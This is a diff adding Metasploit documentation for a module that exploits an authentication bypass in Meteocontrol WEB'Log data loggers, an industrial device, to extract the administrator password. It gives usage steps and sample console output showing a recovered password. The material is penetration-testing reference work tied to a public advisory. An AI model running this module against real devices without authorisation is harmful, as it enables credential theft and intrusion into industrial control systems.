|
| 1 | +Meteocontrol WEB'Log Data Loggers are affected with an authentication bypass vulnerability. The module exploits this vulnerability to remotely extract Administrator password for the device management portal. |
| 2 | + |
| 3 | +Note: In some versions, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Manual verification will be required in such cases. |
| 4 | + |
| 5 | +## Verification Steps |
| 6 | + |
| 7 | +1. Do: ```auxiliary/scanner/http/meteocontrol_weblog_extractadmin``` |
| 8 | +2. Do: ```set RHOSTS [IP]``` |
| 9 | +3. Do: ```set RPORT [PORT]``` |
| 10 | +4. Do: ```run``` |
| 11 | + |
| 12 | +## Sample Output |
| 13 | + |
| 14 | + ``` |
| 15 | +msf > use auxiliary/scanner/http/meteocontrol_weblog_extractadmin |
| 16 | +msf auxiliary(meteocontrol_weblog_extractadmin) > info |
| 17 | +
|
| 18 | + Name: MeteoControl WEBLog Password Extractor |
| 19 | + Module: auxiliary/scanner/http/meteocontrol_weblog_extractadmin |
| 20 | + License: Metasploit Framework License (BSD) |
| 21 | + Rank: Normal |
| 22 | +
|
| 23 | +Provided by: |
| 24 | + |
| 25 | +
|
| 26 | +Basic options: |
| 27 | + Name Current Setting Required Description |
| 28 | + ---- --------------- -------- ----------- |
| 29 | + Proxies no A proxy chain of format type:host:port[,type:host:port][...] |
| 30 | + RHOSTS yes The target address range or CIDR identifier |
| 31 | + RPORT 8080 yes The target port |
| 32 | + SSL false no Negotiate SSL/TLS for outgoing connections |
| 33 | + THREADS 1 yes The number of concurrent threads |
| 34 | + VHOST no HTTP server virtual host |
| 35 | +
|
| 36 | +Description: |
| 37 | + This module exploits an authentication bypass vulnerability in |
| 38 | + Meteocontrol WEBLog (all models) to extract Administrator password |
| 39 | + for the device management portal. |
| 40 | +
|
| 41 | +References: |
| 42 | + https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01 |
| 43 | + http://cvedetails.com/cve/2016-2296/ |
| 44 | + http://cvedetails.com/cve/2016-2298/ |
| 45 | +
|
| 46 | +msf auxiliary(meteocontrol_weblog_extractadmin) > set rhosts 1.2.3.4 |
| 47 | +msf auxiliary(meteocontrol_weblog_extractadmin) > run |
| 48 | +
|
| 49 | +[+] 1.2.3.4:8080 - Running Meteocontrol WEBlog management portal... |
| 50 | +[*] 1.2.3.4:8080 - Attempting to extract Administrator password... |
| 51 | +[+] 1.2.3.4:8080 - Password is password |
| 52 | +[*] Scanned 1 of 1 hosts (100% complete) |
| 53 | +[*] Auxiliary module execution completed |
| 54 | + ``` |
0 commit comments